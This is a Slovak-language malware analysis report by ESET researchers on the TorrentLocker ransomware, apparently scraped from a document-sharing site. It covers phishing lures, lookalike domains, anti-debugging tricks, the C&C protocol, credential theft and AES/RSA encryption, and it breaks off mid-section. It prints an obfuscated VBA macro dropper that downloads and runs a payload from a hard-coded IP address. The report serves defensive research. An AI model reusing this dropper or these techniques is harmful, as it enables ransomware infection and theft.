TorrentLocker. Marc-Etienne M.Léveillé. Digitálny výpalník v okolitých krajinách. December 2014

Ebat: px
Şu sayfadan göstermeyi başlat:

Download "TorrentLocker. Marc-Etienne M.Léveillé. Digitálny výpalník v okolitých krajinách. December 2014"

Transkript

1 Digitálny výpalník v okolitých krajinách Marc-Etienne M.Léveillé December 2014

2 Digitálny výpalník v okolitých krajinách Marc-Etienne M.Léveillé December 2014

3 OBSAH 1. Zhrnutie 3 2. Predstavenie 5 3. Infekčný vektor Stránka na stiahnutie CAPTCHA Dokument programu Word s makrami VBA 9 4. Celková schéma Analýza malvéru Obfuskácia Dropper Spúšťač Miestne ukladanie Krádež prihlasovacích údajov k protokolu SMTP a adresára Sieťový protokol Výber C&C servera Komunikačný protokol Generovanie identifikačného kódu obete Šifrovanie Analýza dešifrovacieho softvéru Podobnosť s bankovým trójskym koňom Hesperbot Podobnosť stránok určených na šírenie malvéru Opätovné použitie C&C servera Cesta k súboru PDB Štatistika Metodológia Výsledky Záver Poďakovanie Odkazy Prílohy 29 Príloha A: Snímky stránok s CAPTCHA, z ktorých sa sťahoval malvér 29 Príloha B: Zoznam známych domén, na ktorýchh sa nachádza stránka, z ktorej sa stiahne malvér 33 Príloha C: Zoznam známych URL adries.onion, ktoré doručujú informácie o platbe 37 Príloha D: Domény v TorrentLocker DGA 38 Príloha E: Zoznam typov súborov, ktoré TorrentLocker šifruje 39 Príloha F: Zoznam zakódovaných kľúčov 40 Príloha G: Zoznam príkladov 41

4 ZOZNAM TABULIEK Tabuľka č. 1. Príklad domén, ktoré používa TorrentLocker na šírenie 8 Tabuľka č. 2. Názov súboru a obsah miestneho uloženia TorrentLockera. 14 Tabuľka č. 3. Štruktúra správ zasielaných do C&C server. 15 Tabuľka č. 4. Popis rôznych typov dopytov, ktoré TorrentLocker posiela do svojho C&C servera 17 Tabuľka č. 5. Štruktúra pridaná za obsah zašifrovaného súboru. 19 Tabuľka č. 6. Zoznam serverov C&C kontaktovaných v rámci experiment. 23 Tabuľka č. 7. Podrobné údaje desiatich, po sebe idúcich platobných stránok, z jedného C&C servera. 25 ZOZNAM OBRÁZKOV Obrázok č. 1. Obrázok č. 2. Spôsoby, akými sa počítač infikuje TrrentLockerom z nevyžiadanej ovej správy. 6 Stránka, ktorá sa zobrazí používateľom, ktorí používajú iný systém ako Windows. 7 Obrázok č. 3. Príklady stránok, z ktorých sa stiahol malvér. 8 Obrázok č. 4. Od infekcie až po zablokovaný stav. 10 Obrázok č. 5. Príklad stránky s výkupným v anglickom jazyku. 11 Obrázok č. 6. Príklad platobnej stránky v anglickom jazyku, zameranej na Veľkú Britániu. 11 Obrázok č. 7. Pred vykonaním škodlivých úloh sa TorrentLocker injektuje do ostatných procesov. 12 Obrázok č. 8. Žiadosť o OutputDebugString, krát 13 Obrázok č. 9. Použitie chráneného uloženia API na získanie konfigurácie ového klienta. 14 Obrázok č. 10. Rozloženie adresára klienta Thunderbird. 14 Obrázok č. 11. Príklad správy odoslanej do C&C servera. 16 Obrázok č. 12. Snímka obrazovky dešifrovacieho softvéru. 20 Obrázok č. 13. Kľúče AES nie sú jediným rozdielom v dešifrovacom softvéri, ktorý zločinci šíria. 20 Obrázok č. 14. Porovnanie URL adries stránok. 21 Obrázok č. 15. Pomer obetí, ktoré kybernetickým zločincom zaplatili za dešifrovací softvér. 24 Obrázok č. 16. Počet infekcií podľa krajín. 24 Obrázok č. 17. DHL - Rakúsko a Nemecko. 29 Obrázok č. 18. Office of State Revenue Austrália. 29 Obrázok č. 19. Auspost Austrália. 30 Obrázok č. 20. Česká pošta Česká republika. 30 Obrázok č. 21. TTNet Turecko. 31 Obrázok č. 22. Royal Mail Veľká Británia. 31 Obrázok č. 23. SDA Taliansko. 32

5 1. ZHRNUTIE Ransomvér je trieda škodlivého kódu rozširovaného kybernetickými zločincami, ktorí unesú počítač obete, napr. prostredníctvom zašifrovania dokumentov obete, príp. obmedzenia prístupu k aplikáciám. Zločinci požadujú peňažné výkupné za účelom odblokovania infikovaného počítača. Win32/Filecoder.DI, tiež známy pod menom TorrentLocker, patrí do skupiny ransomvéru, ktorý po spustení zakóduje dokumenty, obrázky a iné typy súborov používateľa. Od obete sa požaduje, aby zaplatila gangu zločincov až 4,081 bitcoinov (približne eur) za účelom odšifrovania ich súborov. Toto výkupné je možné zaplatiť iba v bitcoinoch. Názov TorrentLocker mu dali isight Partners vo svojom blogu uverejnenom v auguste 2014 [8]. Pochádza z registračného kľúča používaného malvérom na uloženie konfiguračných informácií, upod falošným názvom Bit Torrent Application. Posledné verzie TorrentLocker už nepoužívajú túto kľúčovú cestu na uloženie informácií. HKEY_CURRENT_USER\Software\Bit Torrent Application\Configuration Na základe toho, čo zistila spoločnosť Vínsula v júni 2014 [7], tkybernetickí zločinci sa rozhodli nazvať ich projekt názvom Racketeer. Slovo rack sa nachádza v predponách funkcií a súborov vo vzorkách samotného TorrentLockeru (rack_init, rack_encrypt_pc, ) aj v názvoch súborov skriptov na C&C serveri (rack_cfg.php, rack_admin.php, ). Racket (v prekl. vydieranie) je v skutočnosti vhodným slovom na popis TorrentLockera: vytvára problém, ktorý je možné vyriešiť jedine zakúpením dešifrovacieho softvéru od zločincov. Nižšie sa nachádza súhrn zistení, o ktorých budeme v tomto dokumente informovať. Z infikovaných systémov, 570 (1,45 %) zaplatilo zločincom výkupné. Týchto 570 platieb gangu nám hovorí, že zarobili sumu medzi a amerických dolárov v bitcoinoch. Podľa údajov z C&C serverov, doteraz bolo zašifrovaných minimálne dokumentov. Domnievame sa, že hráči v pozadí TorrentLockera sú rovnakí ako tí, ktorí sú za skupinou malvéru HesperBot family, bankového trójskeho koňa. Rozosielanie nevyžiadaných ov za účelom šírenia TorrentLockeru je cielené na špecifické krajiny. Doteraz boli útoky zamerané na nasledujúce krajiny: Austrália Rakúsko Kanada Česká republika Taliansko Írsko Francúzsko Nemecko Holandsko Nový Zéland Španielsko Turecko Veľká Británia 3

6 Hráči v pozadí TorrentLockeru reagovali na online správy tým, že porazili indikátory kompromitácie (IOC) používané na detekciu a zmenu spôsobu, ako používajú AES z režimu CTR na režim CBC po tom, čo bol zverejnený spôsob rozbalenia hesla. Prvé stopy TorrentLockera, podľa telemetrie ESETu, sú z februára Online hlásenia sú tiež z tohto dátumu.. 4

7 2. PREDSTAVENIE O TorrentLockeri sa na online stránkach objavilo mnoho informácií. Vieme, že niektoré informácie uvedené v tejto správe už boli nahlásené a analyzované. Ale z dôvodu kompletnosti sme sa rozhodli zahrnúť ich do tejto správy a uviesť organizáciu, ktorá ich nahlásila ako prvá. Na konci tohto dokumentu sa nachádza úplný zoznam odkazov. Na konci roka 2013 si získal ransomvér CryptoLocker [21] veľkú pozornosť. Bol zistený v rámci operácie Operation Tovar [22] v polovici roka I napriek mnohým podobnostiam, TorrentLocker predstavuje iné ohrozenie. Prvé online hlásenie o skupine malvéru TorrentLocker uverejnil TÜBİTAK BİLGEM [1] 20. februára Snímka obrazovky editora registra systému Windows jednoznačne ukazuje použitie HKCU\ Software\Bit Torrent Application\Configuration tak, ako to popísali isight Partners [8] v auguste Verzie zo začiatku roka 2014 neboli až natoľko dômyselné, ako aktuálne šírené verzie malvéru. Od obetí požadovali zaslanie ových správ páchateľom, aby mohli vykonať platbu a dostať dešifrovacie kľúče. Táto časť je v súčasnosti automatizovaná vďaka platobnej stránke, ktorá oznamuje ako zaplatiť bitcoinami za účelom získania dešifrovacieho softvéru. Účelom tejto správy je: predstaviť naše zistenia o najaktuálnejších verziách TorrentLockera, poskytnúť technické podrobnosti o šifrovaní, ktoré malvér používa a vytvoriť odkaz pre budúci výskum tejto hrozby a ransomvéru vo všeobecnosti. Tento dokument je rozdelený do štyroch hlavných častí. Začína sa popisom infekčného vektora ransomvéru TorrentLocker. Potom nasleduje analýza malvéru vrátane podrobností o šifrovaní. Potom nasleduje diskusia o prepojeniach, ktoré sme zistili medzi ľuďmi okolo Hesperbota a TorrentLockera. V poslednej časti sú uvedené štatistiky získané z C&C serverov. 5

8 Download TorrentLocker 3. INFEKČNÝ VEKTOR Hlásenia online od obetí TorrentLockera ukazujú, že infekcia vždy začína nevyžiadanou ovou správou, ktorá od obete požaduje, aby otvorila dokument. Týmto dokumentom je v skutočnosti škodlivý spustiteľný súbor, ktorý nainštaluje TorrentLocker a zašifruje súbory. Telemetria ESETu zároveň naznačuje, že nevyžiadaná správa by mohla byť od augusta 2014 jediným spôsobom infekcie. Cielená ová správa Príloha ovej správy Odkaz na stránku From: From: Dokument MS Word obsahujúci VBA makro Stránka s malvérom s CAPTCHA VBA Co24xH ZIP TL!Torrent Locker Škodlivý spustiteľný súbor EXE Stiahnutie a spustenie ZIP Infikovanie počítača a zakódovanie súboru Obrázok č. 1. Spôsoby, akými sa počítač infikuje TrrentLockerom z nevyžiadanej ovej správy Ako je možné vidieť na obrázku č. 1, existuje niekoľko spôsobov, ako je možné spustiť škodlivý spustiteľný súbor. Boli sme svedkami všetkých zobrazených spôsobov. Napríklad v niektorých prípadoch sa TorrentLocker nachádzal v súbore.zip, ktorý bol prílohou ovej správy. V ostatných prípadoch správa obsahuje prepojenie na stiahnutie súboru.zip buď priamo alebo zo stránky na stiahnutie s aktívnym testom CAPTCHA. 6

9 Nižšie uvádzame niekoľko príkladov predmetov správy poslanej obetiam: Nezaplatená faktúra Sledovanie balíka Nezaplatená pokuta za prekročenú rýchlosť Vo všetkých prípadoch je správa zameraná špecificky na polohu obete. Napríklad, ak je predpoklad, že obeť sa nachádza v Austrálii, bude jej zaslaná falošná informácia o sledovaní balíku, ktorá vyzerá, ako keby bola zaslaná od spoločnosti Australia Post. Polohu potenciálnej obete je možné určiť pomocou domény najvyššej úrovne používanej v ovej adrese cieľa alebo poskytovateľa internetového pripojenia, na ktorého odkazuje. 3.1 Stránka na stiahnutie Jedným z obľúbených a efektívnych spôsobov šírenia TorrentLockera je použitie stránky na stiahnutie, ktorá imituje webové stránky miestnych firiem alebo vládnych organizácií. V tomto scenári je obeti v ovej správe zaslaný odkaz na stránku. Keď obeť klikne na tento odkaz, zobrazí sa falošná stránka, ktorá navádza na stiahnutie škodlivých spustiteľných súborov. Tieto stránky na stiahnutie sa zobrazujú iba používateľom z určitých krajín. Návštevník pochádzajúci z krajiny, ktorá nie je cielená, bude presmerovaný na stránku Google. Filtrovanie je založené na IP adrese obete. Návštevník, ktorý otvorí stránku v operačnom systéme inom ako Windows, bude vyzvaný, aby na návštevu stránky použil počítač so systémom Windows. Na zistenie, či počítač používa Windows, používa server používateľského agenta prehliadača. Obrázok č. 2. Stránka, ktorá sa zobrazí používateľom, ktorí používajú iný systém ako Windows Hráči stojaci za týmto podvodom kupujú názvy domén, ktoré vyzerajú veľmi podobne ako skutočné domény, za účelom oklamania používateľa, ktorý si myslí, že stránky sú skutočné. V nasledujúcej tabuľke je uvedených niekoľko príkladov. 7

10 Tabuľka č. 1. Príklad domén, ktoré používa TorrentLocker na šírenie. Doména falošnej stránky austpost-tracking.com austpost-tracking.org royalmail-tracking.org royalmail-service.co.uk nsw-gov.net osr-nsw-gov.net Doména skutočnej stránky austpost.com.au royalmail.com osr.nsw.gov.au Zoznam známych domén používaných touto skupinou pre stránky na stiahnutie a šírenie TorrentLockera v novembri 2014 je uvedený v Prílohe B. 3.2 CAPTCHA Aby si obeť myslela, že stránka je skutočná, je požiadaná, aby pre stiahnutie údajného dokumentu zadala CAPTCHA kód z obrázka. Tento spôsob použitia obrázka CAPTCHA dáva návštevníkovi falošný pocit bezpečia. V prvých verziách týchto stránok mohol používateľ zadať čokoľvek a škodlivý súbor.zip sa stiahol. Na nových falošných stránkach, stránka odmietne šírenie ransomvéru v prípade zadania nesprávneho kódu z obrázka CAPTCHA. Obrázok č. 3: Príklady stránok, z ktorých sa stiahol malvér. Viac snímok stránok, z ktorých sa stiahol malvér, na stiahnutie nájdete v Prílohe A. 8

11 3.3 Dokument programu Word s makrami VBA V novembri 2014 bol spozorovaný nový spôsob infikovania. Na šírenie TorrentLockera sa stále používajú ové správy, ale tento krát je to súbor.zip ako príloha k správe. Tento.zip súbor obsahuje dokument programu Word (.doc) Ak používateľ zapne makrá, spustí sa skript VBA. Skript následne stiahne a spustí binárny súbor Win 32 PE TorrentLockera. Skript VBA je mierne obfuskovaný. Pôvodný obfuskovaný kód VB [...] Open Chr(82) & Chr(76) & Chr(76) & Chr(69) & Chr(81) & Chr(65) & Chr(46) & Chr(82) & Chr(72) & Chr(76) For Binary As 12 kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf Put #12,, eheqiubn kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf Close #12 kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf cmxhwsuo: kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf xwrr5e2ngn3ofo65cnfwctqt7rvvyxzu0gbdg47u8h3zgt9hcb Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(49) & Chr(48) & Chr(57) & Chr(46) & Chr(49) & Chr(48) & Chr(53) & Chr(46) & Chr(49) & Chr(57) & Chr(51) & Chr(46) & Chr(57) & Chr(57) & Chr(47) & Chr(97) & Chr(46) & Chr(112) & Chr(110) & Chr(103), Environ(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & Chr(92) & Chr(74) & Chr(75) & Chr(87) & Chr(84) & Chr(89) & Chr(65) & Chr(68) & Chr(88) & Chr(74) & Chr(85) & Chr(77) & Chr(46) & Chr(101) & Chr(120) & Chr(101) kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf End Sub kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf Neobfuskovaný kód Open RLLEQA.RHL For Binary As 12 Put #12,, eheqiubn Close #12 cmxhwsuo: DownloadAndExecute Environ( temp ) & \J KWTYADXJUM.exe End Sub Tento kód slúži ako dropper, stiahne a spustí súbor so zavádzajúcim menom a.png, ktorý je v skutočnosti binárnym súborom Win32 PE, ktorý obsahuje škodlivý kód TorrentLocker. 9

12 4. CELKOVÁ SCHÉMA 2. ZAPLAŤ Infikovaný počítač 1. C&C server Počítač obete je infikovaný ransomvérom TorrentLocker TorrentLocker odosiela správu do C&C servera C&C server odosiela stránku s informáciou o výkupnom TorrentLocker vygeneruje kľúč na zašifrovanie súborov Šifrovací kľúč sa odošle na C&C server, kde sa uloží Dokumenty sa zašifrujú príslušným kľúčom Kľúč sa zlikviduje v počítači obete Obeti sa zobrazí stránka požadujúca výkupné Počet zašifrovaných súborov sa nahlási do C&C servera Obrázok č. 4: Od infekcie až po zablokovaný stav. Keď sa spustí jadro TorrentLockera, požiada server C&C o zobrazenie stránky s výkupným. Táto stránka s výkupným je stránkou HTML s varovaním o infekcii a obsahuje odkaz na platobnú stránku. V prípade úspechu a získania stránky, TorrentLocker vygeneruje náhodný, 256-bitový kľúč s AES šifrovaním. Tento kľúč je pred odoslaním do C&C servera zašifrovaný RSA pomocou zakódovaného 2048-bitového verejného kľúča. TorrentLocker začne so šifrovaním dokumentov v počítači používateľa pomocou vygenerovaného AES kľúča. Šifrovanie je obmedzené na súbory s určitými koncovkami. Zoznam koncoviek je zakódovaný v binárnom kóde (nachádza sa v Prílohe E). Vyhľadá súbory na všetkých pripojených diskoch a sieťových zdrojoch. Po dokončení sa kľúč vymaže z pamäte pomocou funkcie memset (aes_key, 0, aes_key_ size). Ak pamäť nebola odpojená počas procesu šifrovania, je nepravdepodobné, že po úspešnom zašifrovaní sa podarí vytiahnuť kľúč z pamäte. Používa aj funkciu memsetfrom každej kópie vytvoreného kľúča. Nakoniec sa zobrazí stránka s výkupným. 10

13 Obrázok č. 5: Príklad stránky s výkupným v anglickom jazyku. Stránka s výkupným obsahuje odkaz na platobnú stránku, ktorú je možné dosiahnuť prostredníctvom hostiteľského počítača siete Tor prepojeného na doménu.onion. Čo je zaujímavé, tento server prepojený na doménu.onion je v skutočnosti tým istým hostiteľským počítačom, ktorý slúži ako C&C server pre TorrentLocker. Je zakódovaný štandardným názvom domény v príkladoch TorrentLockera, čím zverejňuje ich IP adresy. Vďaka tomu je jednoduché nájsť skutočné umiestnenie servera (resp. pravdepodobne reverzného proxy servera). Obrázok č. 6: Príklad platobnej stránky v anglickom jazyku, zameranej na Veľkú Britániu. Na stránke sa nachádzajú odkazy na neslávne známy CryptoLocker. I napriek použitiu loga CryptoLockera, nepatrí do tej istej skupiny malvéru. Toto je pravdepodobne trik na zmätenie obetí, ktoré hľadajú pomoc, príp. jeho autori boli natoľko leniví, že sa im nechcelo vymyslieť vlastnú značku. 11

14 5. ANALÝZA MALVÉRU 5.1 Obfuskácia New process explorer.exe Dropper Launcher rack-core TorrentLocker Obrázok č. 7: Pred vykonaním škodlivých úloh sa TorrentLocker injektuje do ostatných procesov Pred spustením platby prebehnú dve vrstvy injektácie. Spustiteľný súbor sa šíri v súbore.zip, ktorý nazveme dropper. Tento dropper odšifruje druhú vrstvu, ktorú nazývame spúšťač (launcher). Nakoniec, spúšťač injektuje kód do explorer.exe a spustí vzdialené vlákno v exportovanom symbole remote_entry Dropper Videli sme niekoľko rôznych verzií droppera, ale táto analýza je založená na príklade s dátumom zostavenia 15. október 2014 (SHA-1 začínjúce 40B1D84B). Dropper použije niektoré známe triky na analýzu kódovania binárneho kódu, ako napríklad dynamické rozlišovanie externých symbolov. Neštandardnou technikou zabránenia odstraňovania chýb je použitie API OutputDebugString. Za normálnych okolností, OutputDebugString neurobí nič a okamžite sa vráti, v prípade odstraňovania chýb procesu sa údaje odošlú do odstraňovača chýb (debuggera). Votrelec požiada o vykonanie funkcie krát, kvôli čomu sa odstraňovač chýb zasekne, pretože je príliš pomalý na spracovanie všetkých týchto žiadostí. Dokáže tiež poraziť bezpečnostné mechanizmy Sandbox, ktoré spúšťajú proces v režime odstraňovania chýb. Po skončení slučky pokračuje ďalej v spúšťaní. 12

15 Obrázok č. 8: Žiadosť o OutputDebugString krát Pakovací program použije dva zdroje PE z droppera na rozbalenie jeho obsahu. Prvý zdroj obsahuje 16-bajtový kľúč na začiatku na dešifrovanie zvyšku samého seba. Nanovo dešifrovaná časť obsahuje kľúč na dešifrovanie druhého zdroja a niečoho, čo vyzerá ako konfigurácia pakovacieho programu. Zmenou tejto konfigurácie dokáže pakovací program zapnúť niektoré antivirtuálkové triky, ako napr. kontrola výsledku pokynu in alebo vpcext, ktoré sa používajú na detekciu VMWare, resp. virtualizačného softvéru VirtualPC. Šifrovanie použité na dešifrovanie zdroja je mierne upravené RC4. Počas dešifrovania, premenná, ktorá by mala byť nastavená na nulu, zostáva bez úprav. To znamená rozdielny výsledok v dešifrovanom čistom texte. Čo je zaujímavé, táto chyba sa nachádza tiež v MiniDuke, ako to zdokumentoval F-Secure vo svojom dokumente o skupine takéhoto softvéru (strana 9). Nie je jasné, či tam táto chyba bola ponechaná zámerne, alebo iba na oklamanie hľadačov malvéru. Čistý text druhého zdroja je súbor PE. Dropper vytvorí nový proces v pozastavenom stave, nájde pamäť v tomto novom procese, zapíše obsah dešifrovaného PE súboru a obnoví proces na jeho spustenie v počiatočnom bode. Tento nový proces nazývame spúšťač Spúšťač (launcher) Spúšťač je vcelku jednoduchý. Má dva dôvody: skopírovať dropper a spustiť jadro TorrentLockera. Aby tak mohol urobiť, dešifruje a potom rozbalí DLL s aplib a vloží svoj kód do nového procesu explorer.exe alebo svchost.exe. Ak nemá administrátorské práva, vyžiada si ich od používateľa a potom opätovne spustí dropper s nimi. 5.2 Miestne ukladanie TorrentLocker ukladá niektoré údaje priamo v infikovanom zariadení. Predtým ukladal údaje do registra systému Windows, ale najaktuálnejšie verzie používajú súbory v náhodne pomenovaných adresároch pod adresárom Application Data (Údaje aplikácie) v profile All Users (Všetci používatelia), príp. v adresári Programs (Programy). Súbory sú zašifrované kódom AES-256- CBC. Kľúč je zakódovaný v binárnej sústave a mení sa v závislosti na kampani. Existuje aj kód na vytvorenie kľúča AES založeného na dátume inštalácie systému Windows, ale vyzerá to, že tento kód sa nepoužíva. Inicializačný vektor (IV) je rovnaký vo všetkých skúmaných variantoch. Je uvedený v Prílohe F. 13

16 Tabuľka č. 2. Názov súboru a obsah miestneho uloženia TorrentLockera. Názov súboru (alebo kľúča registra) Obsah Číslo predstavujúce jeho aktuálny stav (stránka s výkupným prijatá, súbory sú zašifrované, atď.) PE súbor droppera Cesta k dropperovi, súboru PE na disku Obsah HTML stránky s výkupným Počet zašifrovaných súborov 5.3 Krádež prihlasovacích údajov k protokolu SMTP a adresára Vedľajšou úlohou TorrentLockera je získavať údaje z ových klientov. Ukradne prihlasovacie údaje pre nastavenia SMTP servera a adresár obete. Obsahuje kód, ktorý funguje pre Thunderbird, Outlook, Outlook Express a Windows Mail. Obrázok č. 9: Použitie chráneného uloženia API na získanie konfigurácie ového klienta. Obrázok č. 10: Rozloženie adresára klienta Thunderbird. Keďže vieme, že TorrentLocker sa šíri prostredníctvom nevyžiadaných ových správ, krádež týchto informácií má veľký význam. Útočníci používajú zoznam ových adries, ktoré získajú, 14

17 na rozoslanie ďalších nevyžiadaných správ. Dokáže tiež použiť poverenia protokolu SMTP na vyrovnanie reputácie legitímnych kont SMTP, na odoslanie jeho prepojení a príloh, ktoré vedú k ďalších inštaláciám TorrentLockera. 5.4 Sieťový protokol Nezabudnite, že sieťový protokol popísaný v tomto dokumente je založený na príkladoch ransomvéru TorrentLocker šíreného medzi októbrom 2014 a vydaním tohto dokumentu Výber C&C servera TorrentLocker komunikuje so svojim C&C serverom pomocou zakódovanej URL adresy nachádzajúcej sa v spustiteľnom súbore. V prípade, že doména sa nerozlúšti alebo server neodpovedá, na vytvorenie zoznamu 30 názvov domén sa použije algoritmus na generovanie domén (DGA). Funkcia DGA bola pridaná do TorrentLockera v októbri Kompletný zoznam názvov domén vygenerovaných najaktuálnejšími verziami TorrentLockera sa nachádza v Prílohe D. Jedna z nich je zaregistrovaná, ale neslúži ako C&C server (nereaguje na HTTPS). Nemyslíme si, že páchateľ túto doménu zaregistroval Komunikačný protokol TorrentLocker používa celkom jednoduchý protokol na hlásenie do svojho C&C servera. Tento protokol sa časom zmenil. Táto správa popisuje najnovšiu verziu, aktuálne používanú. Šifrovanie TorrentLocker používa na šifrovanie komunikácie s C&C serverom protokol SSL. O niektorých verziách je známe, že namiesto SSL používajú šifrovanie XOR, ako to popísali isight Partners [10] v septembri Každá požiadavka HTTP POST do C&C servera obsahuje nasledovné údaje: Tabuľka č. 3. Štruktúra správ zasielaných do C&C servera. Typ Nulou ukončený reťazec s 32 znakmi (66 bajtov) Nulou ukončený reťazec s 32 znakmi (66 bajtov) Popis Generované identifikačné číslo počítača založené na názve počítača, verzii systému Windows a dátume inštalácie Názov kampane Celé číslo, 1 bajt Typ dopytu (0-6) Celé číslo, 4 bajty n bajtov Dĺžka doplnkových údajoch (0 v prípade, že sa neposielajú žiadne doplnkové údaje) Doplnkové údaje 15

18 Obrázok č. 11: Príklad správy odoslanej do C&C servera. Nižšie je uvedený obsah polí pre túto ukážkovú správu: { } computer_id: RICK-PC-E4C03B402B6B37D campaign_id: ad-x command_id: 4 (Send SMTP credentials) arg_length: 120 arg_string: smtp.mail.yahoo.com:25:orgone_2000@yahoo.com:passw0rd123:0\r\n Nižšie je uvedený zoznam dostupných typov dopytov, ktoré môžu byť odoslané do C&C servera: 16

19 Tabuľka č. 4. Popis rôznych typov dopytov, ktoré TorrentLocker posiela do svojho C&C servera. Typ Popis Obsah doplnkových údajov Údaje vrátené z C&C servera 0 Načítať stránku žiadny stránka HTML s výkupným 1 Poslať kľúč AES-256 Kľúč AES-256 zašifrovaný RSA žiadne zašifrovaný RSA 2 Poslať zašifrovaný počet Zašifrovaný počet súborov (celé číslo, 4-bajty) žiadne súborov 3 Poslať adresár Zoznam mien a ových adries v adresári žiadne 4 Poslať poverenia SMTP Zoznam SMTP údajov v stĺpcoch (server, port, žiadne užívateľské meno a heslo, atď.) 5 Poslať poverenia SMTP Podobné ako typ č. 4 žiadne 6 Poslať protokoly Vlákno správy s informáciami o chybe, funkcii a riadku žiadne Generovanie identifikačného kódu obete Keď sa počítač infikovaný TorrentLockerom nahlási do svojho C&C servera, vygeneruje sa používateľský kód, ktorý neskôr bude slúžiť na identifikáciu tejto obete a ktorý udáva jedinečnú adresu URL, kde je možné zaplatiť a stiahnuť softvér na dešifrovanie. URL adresa má nasledujúci tvar: Pre uľahčenie prístupu k.onion doméne, stránka s výkupným obsahuje prepojenie na webové stránky pôsobiace ako prenosy na Tor2web tak, aby si obete nemuseli do počítača inštalovať webové prehliadače, kde je aktivovaný Tor, aby mali prístup na platobnú stránku. Používateľský kód vyzerá ako náhodný reťazec 6 alfanumerických znakov. Avšak v prípade dvoch infikovaní v podobnom čase, ich používateľské kódy budú tiež podobné. Je veľmi pravdepodobné, že používateľské kódy boli buď založené na čase, príp. nasledujú postupnosť. Po ďalšej analýze zistili analytici ESETu, že serverom generované používateľské kódy sú v skutočnosti predvídateľné. Zoberme si tri používateľské kódy vygenerované serverom v 10-sekundových intervaloch (➊). base 36 to base 10 5un33i -> > = up899 -> > = urdf0 -> > = ➊ ➋ ➌ +1-1 ➍ Používateľský kód je v skutočnosti 36-miestne celé číslo. Po konverzii do desiatkovej sústavy (➋), vznikne vysoké 9-miestne až 10-miestne celé číslo. Ak oddelíte posledných 5 číslic od ostatných (➌), dostanete dve série. Séria najdôležitejších číslic sa zakaždým zvyšuje po jednom čísle, zatiaľ čo séria najmenej dôležitých číslic sa znižuje. Ak pridáte dve celé čísla, zistíte, že súčet je vždy (➍). Pre prevádzkovateľov to vytvára bezstavový spôsob ako overiť, či používateľský kód je legitímny alebo nie. 17

20 Na základe týchto vedomostí sa podarilo analytikom ESETu vyžiadať si všetky stránky s výkupným z rôznych C&C serverov. Štatistiky sú uvedené v časti Štatistiky tohto dokumentu. 5.5 Šifrovanie V septembri 2014 uverejnil NIXU [9] blogový príspevok s trikmi, ako dešifrovať súbory zašifrované TorrentLockerom. Bolo možné rozbaliť heslo XORovaním zašifrovaného súboru s veľkosťou 2 MB jeho nezašifrovanou kópiou. Používateľ Nathan Scott poskytol tiež nástroj s grafickým užívateľským rozhraním na automatizáciu dešifrovacieho procesu. Po zverejnení informácie o možnosti rozbalenia hesla autori TorrentLockera zmenili šifrovanie, aby vylúčili túto možnosť. Heslo bolo možné rozbaliť, pretože TorrentLocker používal AES-256 v režime CTR (Counter) s rovnakým kľúčom a IV pre každý súbor. V tomto režime heslo nie je závislé na obsahu čistého textu, vďaka čomu je AES v režime CTR celé číslo v rade. Preto je na rozbalenie hesla možné použiť rovnaký kľúč použitím XORovania známymi číslami. Toto heslo je možné prehrať na inom zašifrovanom dokumente na získanie čistého textu. Na zabránenie spôsobu rozbaľovania tohto hesla autori TorrentLockera zmenili spôsob šifrovania, ktoré používajú na šifrovanie dokumentov v infikovanom systéme. Stále sa šifrujú pomocou AES-256, ale teraz používajú režim CBC (Cipher-block chaining). CBC chráni proti rozbaleniu hesla. Zvyšok šifrovania popísaného v tomto dokumente platí aj na staršie verzie TorrentLockera. TorrentLocker používa pre potreby šifrovania knižnicu LibTomCrypt. Generovanie kľúča Počas infikovania sa generuje jediný kľúč AES-256. Tento kľúč sa potom používa na zašifrovanie všetkých súborov v systéme. Na vygenerovanie 256-bitového kľúča sa používa algoritmus Yarrow od LibTomCrypt, generátor pseudonáhodného čísla. Je nasadený so spätnou hodnotou nasledujúcich funkcií: 1. GetTickCount 2. GetCurrentProcessId 3. GetCurrentThreadId 4. GetDesktopWindow 5. GetForegroundWindow 6. GetShellWindow 7. GetCapture 8. GetClipboardOwner 9. GetOpenClipboardOwner 10. GetFocus 11. GetActiveWindow 12. GetKBCodePage 13. GetProcessHeap 14. GetThreadTimes(GetCurrentThread()) 15. GetProcessTimes(GetCurrentProcess()) Aj keď niektoré z bajtov v tomto 120-bajtovom jadre je možné uhádnuť, je tu príliš veľa neznámych, aby bolo možné násilím prelomiť jadro a pokúsiť sa vygenerovať rovnaký kľúč. IV používané pre AES-256 bolo rovnaké pre všetky binárne kódy TorrentLockera. Je uvedené v Prílohe F. 18

21 Exfiltrácia kľúča Predtým, ako sa súbory zašifrujú, kľúč sa zašifruje verejným, 2048-bitovým verejným kľúčom RSA, ktorý je súčasťou TorrentLockera, ktorý sa potom odošle do C&C servera s typom požiadavky nastaveným na 1. V príkladoch malvéru je kľúč zakódovaný DER vo formáte PKCS#1 RSAPublicKey. PKCS#1 OAEP sa používa ako výplň. Formát zašifrovaného súboru Ako nahlásil NIXU [9], TorrentLocker zašifruje iba prvé 2 MB súboru. Toto je pravdepodobne voľba autora malvéru z dôvodov výkonu. Zašifrovanie prvých 2 MB vo väčšine prípadov aj tak spôsobí, že súbor je nepoužiteľný. Na konci zašifrovaného súboru sa pridávajú tri položky: Tabuľka č. 5. Štruktúra pridaná za obsah zašifrovaného súboru. Veľkosť 4-bajtové číslo 4-bajtové číslo n bajtov Obsah Kontrolný súčet Adler-32 kľúča AES-256. Veľkosť kľúča zašifrovaného RSA (pravdepodobne 256) Kľúč AES-256 zašifrovaný verejným kľúčom RSA TorrentLockera Kontrolný súčet Adler-32 bol 